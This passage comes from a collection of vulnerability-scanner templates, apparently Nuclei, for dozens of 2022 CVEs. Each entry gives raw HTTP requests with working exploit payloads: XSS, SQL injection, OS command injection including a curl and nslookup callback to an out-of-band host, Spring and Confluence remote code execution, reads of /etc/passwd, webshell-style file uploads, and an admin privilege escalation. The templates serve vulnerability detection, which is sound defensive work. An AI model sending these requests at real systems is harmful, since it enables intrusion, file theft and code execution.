/index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=entities/entities_groups&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0\n"],"cookie-reuse":true,"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-2756","info":{"name":"Kavita <0.5.4.1 - Server-Side Request Forgery","severity":"medium"},"requests":[{"raw":["POST /api/account/login HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/plain, */*\nContent-Type: application/json\n\n{\"username\":\"{{username}}\",\"password\":\"{{password}}\"}\n","POST /api/upload/upload-by-url HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/plain, */*\nAuthorization: Bearer {{token}}\nContent-Type: application/json\n\n{\"url\":\"http://oast.me/#.png\"}\n","GET /api/image/cover-upload?filename=coverupload_{{filename}}.png HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Bearer {{token}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["Interactsh Server"]},{"type":"word","part":"header","words":["image/png"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"token","group":1,"regex":["\"token\":\"(.*?)\""],"internal":true},{"type":"regex","name":"filename","group":1,"regex":["coverupload.(.*?).png"],"internal":true}]}]},{"id":"CVE-2022-2599","info":{"name":"WordPress Anti-Malware Security and Brute-Force Firewall <4.21.83 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=GOTMLS-settings&GOTMLS_debug=<%2Fscript><img+src+onerror%3Dalert%28document.domain%29> HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><img src onerror=alert(document.domain)>","GOTMLS_mt"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-28079","info":{"name":"College Management System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /admin/asign-single-student-subjects.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsubmit=Press&roll_no=3&course_code=sd' UNION ALL SELECT CONCAT(md5({{num}}),12,21),NULL,NULL,NULL,NULL#\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["{{md5({{num}})}}"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2022-38295","info":{"name":"Cuppa CMS v1.0 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&password={{password}}&language=en&task=login\n","POST /components/table_manager/classes/functions.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nid_field=0&name_field=\"><script>alert(document.domain)</script>&admin_login_field=1&site_login_field=1&enabled_field=1&view=cu_user_groups&function=saveAdminTable\n","POST /components/table_manager/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\npath=component%2Ftable_manager%2Fview%2Fcu_user_groups&uniqueClass=\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["\"><script>alert(document.domain)</script>","cuppa_html"],"condition":"and"},{"type":"word","part":"header_3","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-25488","info":{"name":"Atom CMS v2.0 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/ajax/avatar.php?id=-1+union+select+md5({{num}})%23"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["/{{md5(num)}}","avatar-container"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-30525","info":{"name":"Zyxel Firewall - OS Command Injection","severity":"critical"},"requests":[{"raw":["POST /ztp/cgi-bin/handler HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"command\":\"setWanPortSt\",\"proto\":\"dhcp\",\"port\":\"4\",\"vlan_tagged\":\"1\",\"vlanid\":\"5\",\"mtu\":\"; curl {{interactsh-url}};\",\"data\":\"hi\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2022-25497","info":{"name":"Cuppa CMS v1.0 - Local File Inclusion","severity":"medium"},"requests":[{"raw":["POST /js/filemanager/api/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"from\":\"//../../../../../../../../../../../../../etc/passwd\",\"to\":\"/../{{randstr}}.txt\",\"action\":\"copyFile\"}\n","GET /{{randstr}}.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header_2","words":["text/plain"]},{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-26352","info":{"name":"DotCMS - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /api/content/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=------------------------aadc326f7ae3eac3\n\n--------------------------aadc326f7ae3eac3\nContent-Disposition: form-data; name=\"name\"; filename=\"../../../../../../../../../srv/dotserver/tomcat-9.0.41/webapps/ROOT/{{randstr}}.jsp\"\nContent-Type: text/plain\n\n<%\nout.println(\"CVE-2022-26352\");\n%>\n--------------------------aadc326f7ae3eac3--\n","GET /{{randstr}}.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(body_2, \"CVE-2022-26352\")","status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2022-2034","info":{"name":"WordPress Sensei LMS <4.5.0 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/wp/v2/sensei-messages/{{num}}"],"payloads":{"num":"helpers/wordlists/numbers.txt"},"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["sensei_message","guid\":{\"rendered\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2219","info":{"name":"Unyson < 2.7.27 - Cross Site Scripting","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=fw-extensions&sub-page=extension&extension=feedback<script>alert(document.domain)</script>  HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"script%3Ealert%28document.domain%29%3C%2Fscript%3\")","contains(body_2, \"Unyson\")"],"condition":"and"}]}]},{"id":"CVE-2022-0140","info":{"name":"WordPress Visual Form Builder <3.0.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-admin/admin.php?page=vfb-export HTTP/1.1\nHost: {{Hostname}}\nReferer: {{RootURL}}/wp-admin/admin.php?page=vfb-export\nContent-Type: application/x-www-form-urlencoded\nOrigin: {{RootURL}}\n\nvfb-content=entries&format=csv&entries_form_id=1&entries_start_date=0&entries_end_date=0&submit=Download+Export+File\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"Date Submitted\"","\"Entries ID\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-22965","info":{"name":"Spring - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST {{BaseURL}} HTTP/1.1\nContent-Type: application/x-www-form-urlencoded\n\nclass.module.classLoader.resources.context.configFile={{interact_protocol}}://{{interactsh-url}}&class.module.classLoader.resources.context.configFile.content.aaa=xxx\n","GET /?class.module.classLoader.resources.context.configFile={{interact_protocol}}://{{interactsh-url}}&class.module.classLoader.resources.context.configFile.content.aaa=xxx HTTP/1.1\n"],"payloads":{"interact_protocol":["http","https"]},"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: Java"],"case-insensitive":true}]}]},{"id":"CVE-2022-22242","info":{"name":"Juniper Web Device Manager - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/error.php?SERVER_NAME=<script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","The requested resource is not authorized to view"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-4325","info":{"name":"WordPress Post Status Notifier Lite <1.10.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/options-general.php?page=post-status-notifier-lite&controller=%3Cscript%3Ealert%28%60document.domain%60%29%3C%2Fscript%3E HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"<script>alert(`document.domain`)</script>\")","contains(body_2, \"Post Status Notifier Lite\")"],"condition":"and"}]}]},{"id":"CVE-2022-26134","info":{"name":"Confluence - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/","{{BaseURL}}/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22nslookup%20{{interactsh-url}}%22%29%7D/"],"stop-at-first-match":true,"req-condition":true,"matchers-condition":"or","matchers":[{"type":"dsl","dsl":["contains(to_lower(header_1), \"x-cmd-response:\")"]},{"type":"dsl","dsl":["contains(interactsh_protocol, \"dns\")","contains(to_lower(response_2), \"confluence\")"],"condition":"and"}],"extractors":[{"type":"kval","kval":["x_cmd_response"],"part":"header"}]}]},{"id":"CVE-2022-31845","info":{"name":"WAVLINK WN535 G3 - Information Disclosure","severity":"high"},"requests":[{"raw":["@timeout: 10s\nGET /live_check.shtml HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["Model=","FW_Version=","LanIP="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-27926","info":{"name":"Zimbra Collaboration (ZCS) - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/public/error.jsp?errCode=%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(document.domain)>Title???"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31983","info":{"name":"Online Fire Reporting System v1.0 - SQL injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/?page=requests/manage_request&id=1'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"Request Detail\")"],"condition":"and"}]}]},{"id":"CVE-2022-45805","info":{"name":"WordPress Paytm Payment Gateway <=2.7.3 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","@timeout: 15s\nGET /wp-admin/post.php?post=1+AND+(SELECT+6205+FROM+(SELECT(SLEEP(6)))RtRs)&action=edit HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["duration_2>=6","status_code_2 == 200","contains(body_2, \"toplevel_page_paytm\")"],"condition":"and"}]}]},{"id":"CVE-2022-31126","info":{"name":"Roxy-WI <6.1.1.0 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /app/options.py HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}/app/login.py\n\nalert_consumer=1&serv=127.0.0.1&ipbackend=\";cat+/etc/passwd+##&backend_server=127.0.0.1\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-38870","info":{"name":"Free5gc 3.2.1 - Information Disclosure","severity":"high"},"requests":[{"raw":["GET /api/subscriber HTTP/1.1\nHost: {{Hostname}}\nToken: admin\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"plmnID\":","\"ueId\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0948","info":{"name":"WordPress Order Listener for WooCommerce <3.2.2 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nPOST /?rest_route=/olistener/new HTTP/1.1\nHost: {{Hostname}}\ncontent-type: application/json\n\n{\"id\":\" (SLEEP(6))#\"}\n","GET /wp-content/plugins/woc-order-alert/assets/admin/js/scripts.js HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["duration_1>=6","status_code_1 == 200","contains(content_type_1, \"application/json\")","contains(body_2, \"olistener-action.olistener-controller\")"],"condition":"and"}]}]},{"id":"CVE-2022-46934","info":{"name":"kkFileView 4.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/picturesPreview?currentUrl=aHR0cDovLyIpO2FsZXJ0KGRvY3VtZW50LmRvbWFpbik7Ly8=&urls"],"matchers-condition":"and","matchers":[{"type":"word","words":["document.getElementById(\"http://\");alert(document.domain);//\").click();","viewer.min.css"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-22536","info":{"name":"SAP Memory Pipes (MPI) Desynchronization","severity":"critical"},"requests":[{"raw":["GET {{sap_path}} HTTP/1.1\nHost: {{Hostname}}\nContent-Length: 82646\nConnection: keep-alive\n\n{{repeat(\"A\", 82642)}}\n\nGET / HTTP/1.1\nHost: {{Hostname}}\n\n"],"payloads":{"sap_path":["/sap/admin/public/default.html","/sap/public/bc/ur/Login/assets/corbu/sap_logo.png"]},"stop-at-first-match":true,"unsafe":true,"read-all":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(tolower(body), 'administration')","contains(tolower(header), 'content-type: image/png')"],"condition":"or"},{"type":"word","part":"body","words":["HTTP/1.0 400 Bad Request","HTTP/1.0 500 Internal Server Error","HTTP/1.0 500 Dispatching Error"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-34049","info":{"name":"WAVLINK WN530HG4 - Improper Access Control","severity":"medium"},"requests":[{"raw":["GET /cgi-bin/ExportLogs.sh HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Login","Password"],"condition":"and"},{"type":"word","part":"header","words":["filename=\"sysLogs.txt\""]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29301","info":{"name":"SolarView Compact 6.00 - 'pow' Cross-Site Scripting","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/Solar_SlideSub.php?id=4&play=1&pow=sds%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3C%22&bgcolor=green"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script><\"\">","SolarView"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-46888","info":{"name":"NexusPHP <1.7.33 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/login.php?secret=\"><script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["value=\"\"><script>alert(document.domain)</script>\">","NexusPHP"],"case-insensitive":true,"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-38463","info":{"name":"ServiceNow - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/logout_redirect.do?sysparm_url=//j%5c%5cjavascript%3aalert(document.domain)"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["top.location.href = 'javascript:alert(document.domain)';"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1946","info":{"name":"WordPress Gallery <2.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=wpda_gall_load_image_info&start=0&limit=1&gallery_current_index=<script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["wpdevar_gall_img_url_h[<script>alert(document.domain)</script>]"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-45038","info":{"name":"WBCE CMS v1.5.4 -  Cross Site Scripting (Stored)","severity":"medium"},"requests":[{"raw":["GET /admin/login/index.php HTTP/1.1\nHost: {{Hostname}}\n","POST /admin/login/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nurl=&username_fieldname={{username_fieldname}}&password_fieldname={{password_fieldname}}&{{username_fieldname}}={{username}}&{{password_fieldname}}={{password}}&submit=Login\n","GET /admin/settings/ HTTP/1.1\nHost: {{Hostname}}\n","POST /admin/settings/save.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nadvanced=no&formtoken={{formtoken}}&website_footer=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&page_trash=inline&home_folders=true&intro_page=false&frontend_login=false&frontend_signup=false&submit=&default_language=EN&default_timezone=0&default_date_format=d.m.Y&default_time_format=H%3Ai&default_template=wbcezon&default_theme=wbce_flat_theme&search=public&search_template=&page_spacer=-&app_name={{app_name}}&sec_anchor=wbce_&wbmailer_default_sendername=WBCE+CMS+Mailer&wbmailer_routine=phpmail&wbmailer_smtp_host=&wbmailer_smtp_port=&wbmailer_smtp_secure=&wbmailer_smtp_username=&wbmailer_smtp_password=\n","GET /search/index.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","Results For"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"username_fieldname","group":1,"regex":["name=\"username_fieldname\" value=\"(.*)\""],"internal":true,"part":"body"},{"type":"regex","name":"password_fieldname","group":1,"regex":["name=\"password_fieldname\" value=\"(.*)\""],"internal":true,"part":"body"},{"type":"regex","name":"formtoken","group":1,"regex":["name=\"formtoken\" value=\"(.*)\""],"internal":true,"part":"body"},{"type":"regex","name":"app_name","group":1,"regex":["name=\"app_name\" value=\"(.*?)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-4060","info":{"name":"WordPress User Post Gallery <=2.19 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=upg_datatable&field=field:exec:head+-1+/etc/passwd:NULL:NULL"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"word","part":"body","words":["recordsFiltered"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-23944","info":{"name":"Apache ShenYu Admin Unauth Access","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugin"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"message\":\"query success\"","\"code\":200"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1013","info":{"name":"WordPress Personal Dictionary <1.3.4 - Blind SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 30s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=ays_pd_ajax&function=ays_pd_game_find_word&groupsIds[]=1)+AND+(SELECT+3066+FROM+(SELECT(SLEEP(5)))CEHy)--+-\n"],"matchers":[{"type":"dsl","dsl":["duration>=5","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"\\\"status\\\":true,\")"],"condition":"and"}]}]},{"id":"CVE-2022-24816","info":{"name":"GeoServer <1.2.2 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /geoserver/wms HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n  <wps:Execute version=\"1.0.0\" service=\"WPS\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns=\"http://www.opengis.net/wps/1.0.0\" xmlns:wfs=\"http://www.opengis.net/wfs\" xmlns:wps=\"http://www.opengis.net/wps/1.0.0\" xmlns:ows=\"http://www.opengis.net/ows/1.1\" xmlns:gml=\"http://www.opengis.net/gml\" xmlns:ogc=\"http://www.opengis.net/ogc\" xmlns:wcs=\"http://www.opengis.net/wcs/1.1.1\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" xsi:schemaLocation=\"http://www.opengis.net/wps/1.0.0 http://schemas.opengis.net/wps/1.0.0/wpsAll.xsd\">\n    <ows:Identifier>ras:Jiffle</ows:Identifier>\n    <wps:DataInputs>\n      <wps:Input>\n        <ows:Identifier>coverage</ows:Identifier>\n        <wps:Data>\n          <wps:ComplexData mimeType=\"application/arcgrid\"><![CDATA[ncols 720 nrows 360 xllcorner -180 yllcorner -90 cellsize 0.5 NODATA_value -9999  316]]></wps:ComplexData>\n        </wps:Data>\n      </wps:Input>\n      <wps:Input>\n        <ows:Identifier>script</ows:Identifier>\n        <wps:Data>\n          <wps:LiteralData>dest = y() - (500); // */ public class Double {    public static double NaN = 0;  static { try {  java.io.BufferedReader reader = new java.io.BufferedReader(new java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec(\"cat /etc/passwd\").getInputStream())); String line = null; String allLines = \" - \"; while ((line = reader.readLine()) != null) { allLines += line; } throw new RuntimeException(allLines);} catch (java.io.IOException e) {} }} /**</wps:LiteralData>\n        </wps:Data>\n      </wps:Input>\n      <wps:Input>\n        <ows:Identifier>outputType</ows:Identifier>\n        <wps:Data>\n          <wps:LiteralData>DOUBLE</wps:LiteralData>\n        </wps:Data>\n      </wps:Input>\n    </wps:DataInputs>\n    <wps:ResponseForm>\n      <wps:RawDataOutput mimeType=\"image/tiff\">\n        <ows:Identifier>result</ows:Identifier>\n      </wps:RawDataOutput>\n    </wps:ResponseForm>\n  </wps:Execute>\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","ExceptionInInitializerError"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-40881","info":{"name":"SolarView 6.00 - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /network_test.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nhost=%0a{{cmd}}%0a&command=ping\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-28290","info":{"name":"WordPress Country Selector <1.6.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","POST /wp-admin/admin-ajax.php?action=check_country_selector HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncountry=%3Cimg%20src%3Dx%20onerror%3Dalert%28document.domain%29%3E&lang=%3Cimg%20src%3Dx%20onerror%3Dalert%28document.domain%29%3E&site_locate=en-US\n"],"cookie-reuse":true,"skip-variables-check":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(document.domain)>","country_selector_"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1952","info":{"name":"WordPress eaSYNC Booking <1.1.16 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nCookie: PHPSESSID=a0d5959357e474aef655313f69891f37\nContent-Type: multipart/form-data; boundary=------------------------98efee55508c5059\n\n--------------------------98efee55508c5059\nContent-Disposition: form-data; name=\"action\"\n\neasync_session_store\n--------------------------98efee55508c5059\nContent-Disposition: form-data; name=\"type\"\n\ncar\n--------------------------98efee55508c5059\nContent-Disposition: form-data; name=\"with_driver\"\n\nself-driven\n--------------------------98efee55508c5059\nContent-Disposition: form-data; name=\"driver_license_image2\"; filename=\"{{randstr}}.php\"\nContent-Type: application/octet-stream\n\n<?php echo md5('CVE-2022-1952');?>\n\n--------------------------98efee55508c5059--\n","GET /wp-admin/admin-ajax.php?action=easync_success_and_save HTTP/1.1\nHost: {{Hostname}}\nCookie: PHPSESSID=a0d5959357e474aef655313f69891f37\n","GET /wp-content/uploads/{{filename}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(header_3, \"text/html\")","status_code_3 == 200","contains(body_1, 'success\\\":true')","contains(body_3, 'e0d7fcf2c9f63143b6278a3e40f6bea9')"],"condition":"and"}],"extractors":[{"type":"regex","name":"filename","group":1,"regex":["wp-content\\\\\\/uploads\\\\\\/([0-9a-zA-Z]+).php"],"internal":true}]}]},{"id":"CVE-2022-29005","info":{"name":"Online Birth Certificate System 1.2 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /obcs/user/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nmobno={{username}}&password={{password}}&login=\n","POST /obcs/user/profile.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nfname={{str}}%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&lname={{str}}%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&add=New+Delhi+India+110001&submit=\n","GET /obcs/user/dashboard.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["contains(header_3, \"text/html\")","status_code_3 == 200","contains(body_3, 'admin-name\\\">{{str}}<script>alert(document.domain);</script>')"],"condition":"and"}]}]},{"id":"CVE-2022-0441","info":{"name":"MasterStudy LMS <2.7.6 - Improper Access Control","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-ajax.php?action=stm_lms_register&nonce={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/json\n\n{\"user_login\":\"{{username}}\",\"user_email\":\"{{user_email}}\",\"user_password\":\"{{password}}\",\"user_password_re\":\"{{password}}\",\"become_instructor\":\"\",\"privacy_policy\":true,\"degree\":\"\",\"expertize\":\"\",\"auditory\":\"\",\"additional\":[],\"additional_instructors\":[],\"profile_default_fields_for_register\":{\"wp_capabilities\":{\"value\":{\"administrator\":1}}}}\n"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["Registration completed successfully","\"status\":\"success\""],"condition":"and"},{"type":"word","part":"header_2","words":["application/json;"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["\"stm_lms_register\":\"([0-9a-z]+)\""],"internal":true},{"type":"kval","kval":["user_email","password"]}]}]},{"id":"CVE-2022-31299","info":{"name":"Haraj 3.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/payform.php?type=upgrade&upgradeid=1&upgradegd=6&price=123&t=1&note=%3C/textarea%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><script>alert(document.domain)</script></textarea>","content=\"nextHaraj"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-23854","info":{"name":"AVEVA InTouch Access Anywhere Secure Gateway - Local File 